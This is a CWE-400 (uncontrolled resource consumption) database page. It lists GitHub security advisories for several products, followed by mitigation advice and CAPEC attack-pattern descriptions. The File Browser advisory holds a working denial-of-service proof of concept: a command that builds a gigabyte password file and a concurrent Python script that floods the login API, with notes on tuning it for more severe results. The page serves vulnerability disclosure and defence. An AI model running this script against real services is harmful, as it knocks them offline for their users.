Common Weakness Enumeration

CWE-400

Discouraged

Uncontrolled Resource Consumption

Abstraction: Class · Status: Draft

The product does not properly control the allocation and maintenance of a limited resource.

5417 vulnerabilities reference this CWE, most recent first.

GHSA-W59C-GWV8-F55J

Vulnerability from github – Published: 2025-09-25 18:30 – Updated: 2025-09-26 21:30
VLAI
Details

An issue in O-RAN Near Realtime RIC ric-plt-submgr in the J-Release environment, allows remote attackers to cause a denial of service (DoS) via a crafted request to the Subscription Manager API component.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-57446"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-09-25T16:15:35Z",
    "severity": "HIGH"
  },
  "details": "An issue in O-RAN Near Realtime RIC ric-plt-submgr in the J-Release environment, allows remote attackers to cause a denial of service (DoS) via a crafted request to the Subscription Manager API component.",
  "id": "GHSA-w59c-gwv8-f55j",
  "modified": "2025-09-26T21:30:28Z",
  "published": "2025-09-25T18:30:34Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-57446"
    },
    {
      "type": "WEB",
      "url": "https://github.com/ting1197/vulnerability-research/tree/main/CVE-2025-57446"
    },
    {
      "type": "WEB",
      "url": "https://lf-o-ran-sc.atlassian.net/browse/RIC-1073"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-W5F9-F469-QPC7

Vulnerability from github – Published: 2023-11-01 00:30 – Updated: 2023-11-09 00:33
VLAI
Details

Uncontrolled resource consumption vulnerability in Cybozu Remote Service 4.1.0 to 4.1.1 allows a remote authenticated attacker to consume huge storage space or cause significantly delayed communication.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-46278"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-11-01T00:15:09Z",
    "severity": "MODERATE"
  },
  "details": "Uncontrolled resource consumption vulnerability in Cybozu Remote Service 4.1.0 to 4.1.1 allows a remote authenticated attacker to consume huge storage space or cause significantly delayed communication.",
  "id": "GHSA-w5f9-f469-qpc7",
  "modified": "2023-11-09T00:33:55Z",
  "published": "2023-11-01T00:30:49Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-46278"
    },
    {
      "type": "WEB",
      "url": "https://cs.cybozu.co.jp/2023/010657.html"
    },
    {
      "type": "WEB",
      "url": "https://jvn.jp/en/jp/JVN94132951"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-W5FC-GJ3H-26RX

Vulnerability from github – Published: 2024-07-10 06:33 – Updated: 2024-07-11 17:25
VLAI
Summary
speaker vulnerable to Denial of Service
Details

All versions of the package speaker are vulnerable to Denial of Service (DoS) when providing unexpected input types to the channels property of the Speaker object makes it possible to reach an assert macro. Exploiting this vulnerability can lead to a process crash.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "speaker"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "0.5.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-21526"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-241",
      "CWE-400"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-07-10T21:38:31Z",
    "nvd_published_at": "2024-07-10T05:15:11Z",
    "severity": "HIGH"
  },
  "details": "All versions of the package speaker are vulnerable to Denial of Service (DoS) when providing unexpected input types to the channels property of the Speaker object makes it possible to reach an assert macro. Exploiting this vulnerability can lead to a process crash.",
  "id": "GHSA-w5fc-gj3h-26rx",
  "modified": "2024-07-11T17:25:31Z",
  "published": "2024-07-10T06:33:52Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21526"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/TooTallNate/node-speaker"
    },
    {
      "type": "WEB",
      "url": "https://github.com/TooTallNate/node-speaker/blob/316afff5a393fce438cf7296011fcfc6e12aa9dc/src/binding.c#L48"
    },
    {
      "type": "WEB",
      "url": "https://security.snyk.io/vuln/SNYK-JS-SPEAKER-6370676"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "speaker vulnerable to Denial of Service"
}

GHSA-W5FM-68J4-FPC4

Vulnerability from github – Published: 2026-06-12 21:51 – Updated: 2026-06-12 21:51
VLAI
Summary
File Browser has a DoS Vulnerability via Public Login API
Details

Summary

Unchecked passwords maximums allow for an arbitrarily large password to be passed into the login API. This spikes CPU and memory, and after testing, crashes, heavily lags any container created, and has even made my docker daemon start to send errors with status code 500 even after the container was destroyed.

Details

When sending JSON in the body of the request to the route api/login, if a large password is sent, there is no checking on a maximum length password. This means that any length string can be sent to the server and it will be hashed. Specifically the function CheckPwd in users/password.go is called to hash and check to see if the user supplied password is valid, but there is no maximum length for the password checked in that function. Depending on how many concurrent requests are being made, there may be no logs about the failed login attempts.

PoC

Create a file with a large password using this command:

yes "thisisalongphraseithinksoyeahitisactuallyimsureitiswhatisthisisamouthwoahimcoolwheredidthiscomefromwowza" | head -n 10000000 > large-password.txt

This makes a file that's about a gigabyte. The n parameter in the head function can be adjusted to increase or decrease the file size. Afterwards, run the following script to make a filebrowser container:

docker run -v filebrowser_data:/srv -v filebrowser_database:/database -v filebrowser_config:/config -p 8080:80 filebrowser/filebrowser

After running the container, it is recommended to bring up some sort of performance dashboard on the container that is running to monitor CPU and memory usage. Afterwards, run the following Python script (make sure to install dependencies: pip install aiohttp asyncio). The CONCURRENT_REQUESTS parameter controls the number of requests to be making at one time. The TOTAL_REQUESTS parameter controls the grand total number of requests sent to the targeted container. If one wants more severe results, turn it up. If one wants less severe results, turn it down. The setting it's on right now is where I've found it can either crash the targeted container or just make it lag until it doesn't respond but is still on.

import aiohttp
import asyncio
from time import perf_counter

url = 'http://localhost:8080/api/login'
CONCURRENT_REQUESTS = 30
TOTAL_REQUESTS = 1000
async def make_request(session, body, semaphore):
    async with semaphore:
        try:
            async with session.post(url, json=body) as response:
                print(response.status)
        except asyncio.TimeoutError:
            print('Request timed out')
        except aiohttp.ConnectionTimeoutError:
            print('Request timed out')
        except Exception as e:
            print(f"Unexpected error {e}")

async def main():
    with open("./large-password.txt", "r") as f:
        file_contents = f.read()

    body = {
        "username": "admin",
        "password": file_contents,
        "recaptcha": ""
    }

    headers = {"Content-Type": "application/json"}
    semaphore = asyncio.Semaphore(CONCURRENT_REQUESTS)

    async with aiohttp.ClientSession(headers=headers) as session:
        tasks = [
            make_request(session, body, semaphore)
            for _ in range(TOTAL_REQUESTS)  
        ]

        start = perf_counter()
        await asyncio.gather(*tasks)
        end = perf_counter()

        print(f"Completed {len(tasks)} requests in {end - start:.2f} seconds")

if __name__ == "__main__":
    asyncio.run(main())

Impact

The vulnerability impacts anyone who uses this service.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2.63.5"
      },
      "package": {
        "ecosystem": "Go",
        "name": "github.com/filebrowser/filebrowser/v2"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.63.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/filebrowser/filebrowser"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "1.11.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-54092"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1284",
      "CWE-400"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-12T21:51:24Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "### Summary\nUnchecked passwords maximums allow for an arbitrarily large password to be passed into the login API. This spikes CPU and memory, and after testing, crashes, heavily lags any container created, and has even made my docker daemon start to send errors with status code 500 even after the container was destroyed.\n\n### Details\nWhen sending JSON in the body of the request to the route `api/login`, if a large password is sent, there is no checking on a maximum length password. This means that any length string can be sent to the server and it will be hashed. Specifically the function `CheckPwd` in `users/password.go` is called to hash and check to see if the user supplied password is valid, but there is no maximum length for the password checked in that function. Depending on how many concurrent requests are being made, there may be no logs about the failed login attempts.\n\n### PoC\nCreate a file with a large password using this command:\n```bash\nyes \"thisisalongphraseithinksoyeahitisactuallyimsureitiswhatisthisisamouthwoahimcoolwheredidthiscomefromwowza\" | head -n 10000000 \u003e large-password.txt\n```\nThis makes a file that\u0027s about a gigabyte. The `n` parameter in the head function can be adjusted to increase or decrease the file size. Afterwards, run the following script to make a filebrowser container:\n```bash\ndocker run -v filebrowser_data:/srv -v filebrowser_database:/database -v filebrowser_config:/config -p 8080:80 filebrowser/filebrowser\n```\n\nAfter running the container, it is recommended to bring up some sort of performance dashboard on the container that is running to monitor CPU and memory usage. Afterwards, run the following Python script (make sure to install dependencies: `pip install aiohttp asyncio `). The `CONCURRENT_REQUESTS` parameter controls the number of requests to be making at one time. The `TOTAL_REQUESTS` parameter controls the grand total number of requests sent to the targeted container. If one wants more severe results, turn it up. If one wants less severe results, turn it down. The setting it\u0027s on right now is where I\u0027ve found it can either crash the targeted container or just make it lag until it doesn\u0027t respond but is still on.\n\n```python\nimport aiohttp\nimport asyncio\nfrom time import perf_counter\n\nurl = \u0027http://localhost:8080/api/login\u0027\nCONCURRENT_REQUESTS = 30\nTOTAL_REQUESTS = 1000\nasync def make_request(session, body, semaphore):\n    async with semaphore:\n        try:\n            async with session.post(url, json=body) as response:\n                print(response.status)\n        except asyncio.TimeoutError:\n            print(\u0027Request timed out\u0027)\n        except aiohttp.ConnectionTimeoutError:\n            print(\u0027Request timed out\u0027)\n        except Exception as e:\n            print(f\"Unexpected error {e}\")\n\nasync def main():\n    with open(\"./large-password.txt\", \"r\") as f:\n        file_contents = f.read()\n\n    body = {\n        \"username\": \"admin\",\n        \"password\": file_contents,\n        \"recaptcha\": \"\"\n    }\n\n    headers = {\"Content-Type\": \"application/json\"}\n    semaphore = asyncio.Semaphore(CONCURRENT_REQUESTS)\n\n    async with aiohttp.ClientSession(headers=headers) as session:\n        tasks = [\n            make_request(session, body, semaphore)\n            for _ in range(TOTAL_REQUESTS)  \n        ]\n\n        start = perf_counter()\n        await asyncio.gather(*tasks)\n        end = perf_counter()\n\n        print(f\"Completed {len(tasks)} requests in {end - start:.2f} seconds\")\n\nif __name__ == \"__main__\":\n    asyncio.run(main())\n```\n\n### Impact\nThe vulnerability impacts anyone who uses this service.",
  "id": "GHSA-w5fm-68j4-fpc4",
  "modified": "2026-06-12T21:51:24Z",
  "published": "2026-06-12T21:51:24Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/filebrowser/filebrowser/security/advisories/GHSA-w5fm-68j4-fpc4"
    },
    {
      "type": "WEB",
      "url": "https://github.com/filebrowser/filebrowser/commit/847d08bdd135e5c3659f2e6dea2f0cd36617af9b"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/filebrowser/filebrowser"
    },
    {
      "type": "WEB",
      "url": "https://github.com/filebrowser/filebrowser/releases/tag/v2.63.6"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "File Browser has a DoS Vulnerability via Public Login API"
}

GHSA-W5GG-2Q56-6H4F

Vulnerability from github – Published: 2024-03-27 18:32 – Updated: 2024-06-10 18:30
VLAI
Summary
Elasticsearch Uncontrolled Resource Consumption vulnerability
Details

A flaw was discovered in Elasticsearch, where processing a document in a deeply nested pipeline on an ingest node could cause the Elasticsearch node to crash.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.elasticsearch:elasticsearch"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "7.0.0"
            },
            {
              "fixed": "7.17.19"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.elasticsearch:elasticsearch"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "8.0.0"
            },
            {
              "fixed": "8.13.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-23450"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-03-27T21:56:08Z",
    "nvd_published_at": "2024-03-27T17:15:53Z",
    "severity": "MODERATE"
  },
  "details": "A flaw was discovered in Elasticsearch, where processing a document in a deeply nested pipeline on an ingest node could cause the Elasticsearch node to crash.",
  "id": "GHSA-w5gg-2q56-6h4f",
  "modified": "2024-06-10T18:30:53Z",
  "published": "2024-03-27T18:32:38Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23450"
    },
    {
      "type": "WEB",
      "url": "https://discuss.elastic.co/t/elasticsearch-8-13-0-7-17-19-security-update-esa-2024-06/356314"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/elastic/elasticsearch"
    },
    {
      "type": "WEB",
      "url": "https://security.netapp.com/advisory/ntap-20240517-0010"
    },
    {
      "type": "WEB",
      "url": "https://www.elastic.co/community/security"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Elasticsearch Uncontrolled Resource Consumption vulnerability"
}

GHSA-W5P7-H5W8-2HFQ

Vulnerability from github – Published: 2021-05-10 18:44 – Updated: 2022-04-27 19:19
VLAI
Summary
Regular Expression Denial of Service in trim
Details

All versions of package trim lower than 0.0.3 are vulnerable to Regular Expression Denial of Service (ReDoS) via trim().

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "trim"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.0.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2020-7753"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2021-04-21T17:44:44Z",
    "nvd_published_at": "2020-10-27T09:15:00Z",
    "severity": "HIGH"
  },
  "details": "All versions of package trim lower than 0.0.3 are vulnerable to Regular Expression Denial of Service (ReDoS) via trim().",
  "id": "GHSA-w5p7-h5w8-2hfq",
  "modified": "2022-04-27T19:19:28Z",
  "published": "2021-05-10T18:44:22Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-7753"
    },
    {
      "type": "WEB",
      "url": "https://github.com/component/trim/pull/8"
    },
    {
      "type": "WEB",
      "url": "https://github.com/component/trim"
    },
    {
      "type": "WEB",
      "url": "https://github.com/component/trim/blob/master/index.js"
    },
    {
      "type": "WEB",
      "url": "https://github.com/component/trim/blob/master/index.js%23L6"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/r10faad1ef9166d37a1a5c9142b1af7099b8ecdc5ad05c51b8ea993d9@%3Ccommits.airflow.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/r51ff3c2a4c7b8402f321eae7e624672cc2295c7bc8c12c8b871f6b0b@%3Ccommits.airflow.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/r75b8d0b88833d7d96afcdce3ead65e212572ead4e7a9f34d21040196@%3Ccommits.airflow.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/rb8462df3b6484e778905c09cd49a8912e1a302659860017ebe36da03@%3Ccommits.airflow.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/rcc7c2865a52b544a8e49386c6880e9b9ab29bfce1052b5569d09ee4a@%3Ccommits.airflow.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1022132"
    },
    {
      "type": "WEB",
      "url": "https://snyk.io/vuln/SNYK-JS-TRIM-1017038"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Regular Expression Denial of Service in trim"
}

GHSA-W5PP-99CH-QJ29

Vulnerability from github – Published: 2026-05-29 19:43 – Updated: 2026-05-29 19:43
VLAI
Summary
go-git: Malformed Git object data may cause panics or resource exhaustion
Details

Impact

Several denial-of-service issues were identified in go-git when parsing maliciously crafted Git repository data.

An attacker may craft a malicious .pack, .idx or loose objects that causes an application using an affected version of go-git to panic or consume excessive resources.

This can lead to denial of service in applications that use go-git to clone, fetch, open, or otherwise process untrusted repositories or Git object data.

Exploitation requires the ability to alter read-only files such as .pack or .idx from the local repository's .git/objects/pack/ directory. Alternatively, the user would need to be interacting with a malicious remote server, which is not recommended and exposes users to a broader class of security risks beyond this issue.

Patches

Users should upgrade to a patched version in order to mitigate this vulnerability. Versions prior to v5 are likely to be affected, users are recommended to upgrade to a supported go-git version.

Credits

go-git thanks @kodareef5, @AyushParkara and @N0zoM1z0 for reporting this in four separate reports. 🙇

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 5.19.0"
      },
      "package": {
        "ecosystem": "Go",
        "name": "github.com/go-git/go-git/v5"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "5.19.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 6.0.0-alpha.3"
      },
      "package": {
        "ecosystem": "Go",
        "name": "github.com/go-git/go-git/v6"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "6.0.0-alpha.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-29T19:43:27Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "### Impact\nSeveral denial-of-service issues were identified in `go-git` when parsing maliciously crafted Git repository data.\n\nAn attacker may craft a malicious `.pack`, `.idx` or loose objects that causes an application using an affected version of `go-git` to panic or consume excessive resources.\n\nThis can lead to denial of service in applications that use `go-git` to clone, fetch, open, or otherwise process untrusted repositories or Git object data.\n\nExploitation requires the ability to alter read-only files such as `.pack` or `.idx` from the local repository\u0027s `.git/objects/pack/` directory. Alternatively, the user would need to be interacting with a malicious remote server, which is not recommended and exposes users to a broader class of security risks beyond this issue.\n\n### Patches\nUsers should upgrade to a patched version in order to mitigate this vulnerability. Versions prior to `v5` are likely to be affected, users are recommended to upgrade to a supported `go-git` version.\n\n### Credits\ngo-git thanks @kodareef5, @AyushParkara and @N0zoM1z0 for reporting this in four separate reports. \ud83d\ude47",
  "id": "GHSA-w5pp-99ch-qj29",
  "modified": "2026-05-29T19:43:27Z",
  "published": "2026-05-29T19:43:27Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/go-git/go-git/security/advisories/GHSA-w5pp-99ch-qj29"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/go-git/go-git"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "go-git: Malformed Git object data may cause panics or resource exhaustion"
}

GHSA-W62G-9V7Q-4MGC

Vulnerability from github – Published: 2022-05-17 01:06 – Updated: 2022-05-17 01:06
VLAI
Details

The Googlemaps plugin before 3.1 for Joomla! allows remote attackers to cause a denial of service via the url parameter to plugin_googlemap2_proxy.php.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2013-7428"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2017-09-07T16:29:00Z",
    "severity": "HIGH"
  },
  "details": "The Googlemaps plugin before 3.1 for Joomla! allows remote attackers to cause a denial of service via the url parameter to plugin_googlemap2_proxy.php.",
  "id": "GHSA-w62g-9v7q-4mgc",
  "modified": "2022-05-17T01:06:30Z",
  "published": "2022-05-17T01:06:30Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2013-7428"
    },
    {
      "type": "WEB",
      "url": "http://seclists.org/fulldisclosure/2013/Jul/158"
    },
    {
      "type": "WEB",
      "url": "http://www.mapsplugin.com/Google-Maps/Documentation-of-plugin-Googlemap/security-release-3-1-of-plugin-googlemaps.html"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2015/02/26/11"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2015/02/27/3"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-W659-5WVM-43MR

Vulnerability from github – Published: 2024-10-08 18:33 – Updated: 2024-10-08 18:33
VLAI
Details

Microsoft Simple Certificate Enrollment Protocol Denial of Service Vulnerability

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-43541"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-10-08T18:15:18Z",
    "severity": "HIGH"
  },
  "details": "Microsoft Simple Certificate Enrollment Protocol Denial of Service Vulnerability",
  "id": "GHSA-w659-5wvm-43mr",
  "modified": "2024-10-08T18:33:16Z",
  "published": "2024-10-08T18:33:16Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43541"
    },
    {
      "type": "WEB",
      "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-43541"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-W6CQ-9CF4-GQPG

Vulnerability from github – Published: 2026-06-30 16:39 – Updated: 2026-06-30 16:39
VLAI
Summary
RabbitMQ vulnerable to Denial of Service by publishing large messages over the HTTP API
Details

Summary

Responsibly disclosed by @NSEcho.

HTTP API did not enforce an HTTP request body limit, making it vulnerable for DoS attacks with very large messages.

Details

An authenticated user with sufficient credentials can publish a very large messages over the HTTP API and cause target node to be terminated by an "out-of-memory killer"-like mechanism.

A PoC was provided to Team RabbitMQ privately.

Impact

Denial of Service

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Hex",
        "name": "rabbit_common"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.12.0"
            },
            {
              "fixed": "3.12.7"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Hex",
        "name": "rabbit_common"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.11.0"
            },
            {
              "fixed": "3.11.24"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-46118"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-30T16:39:12Z",
    "nvd_published_at": "2023-10-25T18:17:36Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\n\nResponsibly disclosed by @NSEcho.\n\nHTTP API did not enforce an HTTP request body limit, making it vulnerable for DoS attacks with very large messages. \n\n### Details\n\nAn authenticated user with sufficient credentials can publish a very large messages over the HTTP API\nand cause target node to be terminated by an \"out-of-memory killer\"-like mechanism.\n\nA PoC was provided to Team RabbitMQ privately.\n\n### Impact\n\nDenial of Service",
  "id": "GHSA-w6cq-9cf4-gqpg",
  "modified": "2026-06-30T16:39:12Z",
  "published": "2026-06-30T16:39:12Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/rabbitmq/rabbitmq-server/security/advisories/GHSA-w6cq-9cf4-gqpg"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-46118"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/rabbitmq/rabbitmq-server"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00009.html"
    },
    {
      "type": "WEB",
      "url": "https://www.debian.org/security/2023/dsa-5571"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "RabbitMQ vulnerable to Denial of Service by publishing large messages over the HTTP API"
}

Mitigation
Architecture and Design

Design throttling mechanisms into the system architecture. The best protection is to limit the amount of resources that an unauthorized user can cause to be expended. A strong authentication and access control model will help prevent such attacks from occurring in the first place. The login application should be protected against DoS attacks as much as possible. Limiting the database access, perhaps by caching result sets, can help minimize the resources expended. To further limit the potential for a DoS attack, consider tracking the rate of requests received from users and blocking requests that exceed a defined rate threshold.

Mitigation
Architecture and Design
  • Mitigation of resource exhaustion attacks requires that the target system either:
  • The first of these solutions is an issue in itself though, since it may allow attackers to prevent the use of the system by a particular valid user. If the attacker impersonates the valid user, they may be able to prevent the user from accessing the server in question.
  • The second solution is simply difficult to effectively institute -- and even when properly done, it does not provide a full solution. It simply makes the attack require more resources on the part of the attacker.
  • recognizes the attack and denies that user further access for a given amount of time, or
  • uniformly throttles all requests in order to make it more difficult to consume resources more quickly than they can again be freed.
Mitigation
Architecture and Design

Ensure that protocols have specific limits of scale placed on them.

Mitigation
Implementation

Ensure that all failures in resource allocation place the system into a safe posture.

CAPEC-147: XML Ping of the Death

An attacker initiates a resource depletion attack where a large number of small XML messages are delivered at a sufficiently rapid rate to cause a denial of service or crash of the target. Transactions such as repetitive SOAP transactions can deplete resources faster than a simple flooding attack because of the additional resources used by the SOAP protocol and the resources necessary to process SOAP messages. The transactions used are immaterial as long as they cause resource utilization on the target. In other words, this is a normal flooding attack augmented by using messages that will require extra processing on the target.

CAPEC-227: Sustained Client Engagement

An adversary attempts to deny legitimate users access to a resource by continually engaging a specific resource in an attempt to keep the resource tied up as long as possible. The adversary's primary goal is not to crash or flood the target, which would alert defenders; rather it is to repeatedly perform actions or abuse algorithmic flaws such that a given resource is tied up and not available to a legitimate user. By carefully crafting a requests that keep the resource engaged through what is seemingly benign requests, legitimate users are limited or completely denied access to the resource.

CAPEC-492: Regular Expression Exponential Blowup

An adversary may execute an attack on a program that uses a poor Regular Expression(Regex) implementation by choosing input that results in an extreme situation for the Regex. A typical extreme situation operates at exponential time compared to the input size. This is due to most implementations using a Nondeterministic Finite Automaton(NFA) state machine to be built by the Regex algorithm since NFA allows backtracking and thus more complex regular expressions.